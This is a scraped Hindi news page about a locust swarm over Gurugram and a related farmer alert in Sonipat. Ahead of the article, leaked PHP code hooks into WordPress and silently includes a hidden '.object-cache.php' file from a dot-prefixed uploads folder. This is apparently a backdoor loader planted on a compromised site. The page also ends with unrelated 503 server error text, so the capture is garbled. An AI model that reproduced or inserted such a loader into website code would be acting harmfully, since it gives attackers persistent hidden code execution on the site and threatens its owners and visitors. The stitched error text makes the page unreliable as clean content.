add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); गुरुग्राम में टिड्डी दल का धावा, शहरी इलाकों में भी आया नजर – SOCH INDIA
Menu

देश
गुरुग्राम में टिड्डी दल का धावा, शहरी इलाकों में भी आया नजर

nobanner

कोरोना से जूझ रहे गुरुग्राम में अब टिड्डी दल ने हमला किया है. गुरुग्राम के भीमगढ़ खेड़ी, राजेंद्र पार्क, सूरत नगर, लक्ष्मण विहार, दौलताबाग फ्लाइओवर पर टिड्डियों का दल मंडरा रहा है. फसलों के ऊपर टिड्डी दलों को मंडराते देखकर किसान परेशान हैं और उन्हें भगाने की कोशिशों में जुटे हैं.

शनिवार को टिड्डियों का दल शहरी इलाकों में भी पहुंच गया है. किसान पटाखे, टिन के डिब्बे बजाकर और धुएं के जरिए टिड्डियों को भगाने की कोशिशों में जुटे हैं. टिड्डी दलों के लगातार हमले से किसान परेशान हैं.

टिड्डी दलों के हमले को लेकर जिला प्रशासन ने कोई एडवाइजरी नहीं जारी की है. राजेंद्र पार्क, सेक्टर-5, सूरत नगर, धनवापुर, पालम विवार और मारुती कंपनी के एरिया में भी लाखों की संख्या में टिड्डी दलों ने धावा बोला है.

साइबर सिटी के लोगों में टिड्डी दल के धावे को लेकर हैरानी देखने को मिल रही है. स्थानीय निवासी खुद ही ताली और तेज आवाज के जरिए टिड्डियों को भगाने की कोशिश कर रहे हैं. एक घंटे से ही इलाके में टिड्डी दल मंडरा रहे हैं. हवा तेज होने की वजह उनकी रफ्तार और बढ़ गई है. कई इलाकों को उन्होंने पूरी तरह से घेर लिया है.

गुरुग्राम में रहने वाले लोगों ने पूरे हमले का वीडियो भी शेयर किया है. रिहायशी कॉलोनियों में भी टिड्डी दल ने दस्तक दी है. लोग सोशल मीडिया पर भी टिड्डी दलों के हमले के वीडियोज शेयर कर रहे हैं.

सोनीपत में भी अलर्ट

दिल्ली से सटे सोनीपत जिला के किसानों को डिप्टी कमिश्नर ने अलर्ट कर दिया है. उन्होंने आशंका जताई है कि ओचंडी बॉर्डर के पास खरखौदा में टिड्डी दल पहुंच सकता है. फिर खरखौदा से टिड्डी दल सोनीपत में शाम तक पहुंच सकता है. ऐसे में उन्होंने किसानों से अपील की है कि वे तेज आवाज करने वाले सभी यंत्र और सामान तैयार रखें.

60 लाख है टिड्डी दलों की संख्या

टिड्डी दल में 60 लाख टिड्डियां हैं. टिड्डियों का यह दल आसमान में 10 किलोमीटर लंबा और 6 किलोमीटर चौड़ा है. प्रशासन ने अनुरोध किया है कि अगर दिन में टिड्डियां आती हैं तो उन्हें तेज आवाज कर भगाएं और रात में आएं तो उन्हें दवाइयों के स्प्रे से भगाएं. प्रशासन ने यह भी दावा किया है कि टिड्डी दलों निपटने की तैयारी पूरी है.

503 Service Unavailable

Service Unavailable

The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

Additionally, a 503 Service Unavailable error was encountered while trying to use an ErrorDocument to handle the request.